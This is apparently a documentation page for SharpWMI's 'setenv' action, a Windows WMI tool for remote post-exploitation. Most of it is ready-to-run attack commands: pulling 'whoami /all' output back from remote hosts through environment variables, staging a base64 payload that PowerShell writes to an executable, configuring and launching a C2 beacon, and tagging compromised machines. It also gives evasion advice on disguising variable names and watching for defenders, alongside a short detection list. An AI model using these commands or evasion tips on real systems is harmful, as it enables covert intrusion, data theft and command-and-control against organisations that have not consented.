Skip to main content

Overview

The setenv action creates or modifies environment variables on local and remote systems using the Win32_Environment WMI class. It can be used for configuration, data storage, or as a covert communication channel.

Syntax

SharpWMI.exe action=setenv name=VARIABLE_NAME value=VARIABLE_VALUE [computername=HOST[,HOST2,...]] [username=DOMAIN\user] [password=Password]

Parameters

ParameterRequiredDescription
actionYesMust be setenv
nameYesEnvironment variable name
valueYesEnvironment variable value
computernameNoTarget host(s), comma-separated. Defaults to localhost
usernameNoUsername for authentication
passwordNoPassword for authentication

Usage Examples

SharpWMI.exe action=setenv name=TEST value="Hello World"

Operational Use Cases

Scenario 1: Data Exfiltration Channel

# 1. Execute command and store result
SharpWMI.exe action=exec computername=target command="whoami /all > C:\temp\out.txt" result=true

# 2. Read file content and store in variable (via PowerShell)
SharpWMI.exe action=exec computername=target command="powershell -c \"$c=Get-Content C:\temp\out.txt -Raw; [Environment]::SetEnvironmentVariable('RESULT',$c,'User')\"" result=true

# 3. Retrieve stored data
SharpWMI.exe action=getenv name=RESULT computername=target

# 4. Clean up
SharpWMI.exe action=delenv name=RESULT computername=target

Scenario 2: Configuration Management

# Set configuration for payload
SharpWMI.exe action=setenv name=C2_SERVER value="192.168.1.100" computername=target.domain.com
SharpWMI.exe action=setenv name=C2_PORT value="443" computername=target.domain.com

# Payload reads these variables at runtime

Scenario 3: Staging Data

# Store encoded payload in environment variable
SharpWMI.exe action=setenv name=PAYLOAD value="<base64_encoded_data>" computername=target.domain.com

# Execute decoder that reads from environment
SharpWMI.exe action=exec computername=target command="powershell -c \"$p=[Environment]::GetEnvironmentVariable('PAYLOAD','User'); $b=[Convert]::FromBase64String($p); [IO.File]::WriteAllBytes('C:\temp\file.exe',$b)\""

Scenario 4: Persistence Marker

# Set marker to indicate compromised system
SharpWMI.exe action=setenv name=SYSTEM_ID value="<unique_identifier>" computername=target.domain.com

# Check marker on revisit
SharpWMI.exe action=getenv name=SYSTEM_ID computername=target.domain.com

Variable Scope

Environment variables are set in the user context:
  • System scope: Requires SYSTEM privileges
  • User scope: Current user or specified user
  • Volatile: Temporary (lost on reboot)
SharpWMI sets variables in the user scope by default. The variable persists across sessions but not reboots unless explicitly set as system-level.

Remote vs Local Usage

  • Local Set
  • Remote Set
SharpWMI.exe action=setenv name=TEST value="VALUE"
Use for:
  • Local configuration
  • Testing
  • Post-exploitation setup

Detection Considerations

  • Win32_Environment class modifications
  • Event ID 5857: WMI activity
  • Sysmon Event ID 19-21: WMI operations
  • Environment variable creation/modification
  • Registry modifications in environment key
  • HKCU\Environment changes
  • HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment changes
  • Event ID 4657: Registry value modification
  • Unusual variable names
  • Large variable values
  • Base64-encoded content
  • Variables created by non-standard processes

Best Practices

Variable Naming

  • Use legitimate-sounding names
  • Blend with existing variables
  • Avoid obvious malicious names
  • Examples: BUILD_CONFIG, SYSTEM_ID, CACHE_PATH

Operational Security

  • Clean up variables after use
  • Don’t store sensitive data in plaintext
  • Use encoding/encryption
  • Monitor for defensive responses

Data Management

  • Keep values reasonably sized
  • Don’t exceed value length limits
  • Consider compression for large data
  • Use delenv to clean up

Persistence

  • Variables persist across logons
  • Lost on system reboot
  • Not suitable for long-term storage
  • Consider scheduled task for persistence

Value Length Limits

Environment variable values have length limitations. Very large values may fail to set.
Recommendations:
  • Keep values under 32KB
  • Use compression for large data
  • Split large data across multiple variables
  • Test with small values first

Troubleshooting

Cause: Insufficient privilegesSolution:
  • Use username and password parameters
  • Verify admin rights on target
  • Check UAC remote restrictions
Cause: WMI operation failedSolution:
  • Check value length
  • Verify WMI service is running
  • Try with shorter value
  • Check for special characters
Cause: Scope or context issueSolution:
  • Variables are user-specific
  • Check with getenv action
  • May need to refresh environment
  • Verify correct username context

getenv

Retrieve environment variables

delenv

Delete environment variables

exec

Execute commands that use variables

query

Custom WMI queries

Examples with Execution

# 1. Set environment variable
SharpWMI.exe action=setenv name=C2_ADDR value="192.168.1.100" computername=target

# 2. Execute payload that reads variable
SharpWMI.exe action=exec computername=target command="powershell -c \"$ip=[Environment]::GetEnvironmentVariable('C2_ADDR','User'); beacon.exe -c $ip\""

# 3. Clean up
SharpWMI.exe action=delenv name=C2_ADDR computername=target

# Using PowerShell to capture and store output
SharpWMI.exe action=exec computername=target command="powershell -c \"$o=whoami /all | Out-String; [Environment]::SetEnvironmentVariable('WHOAMI_OUTPUT',$o,'User')\"" result=true

# Retrieve stored output
SharpWMI.exe action=getenv name=WHOAMI_OUTPUT computername=target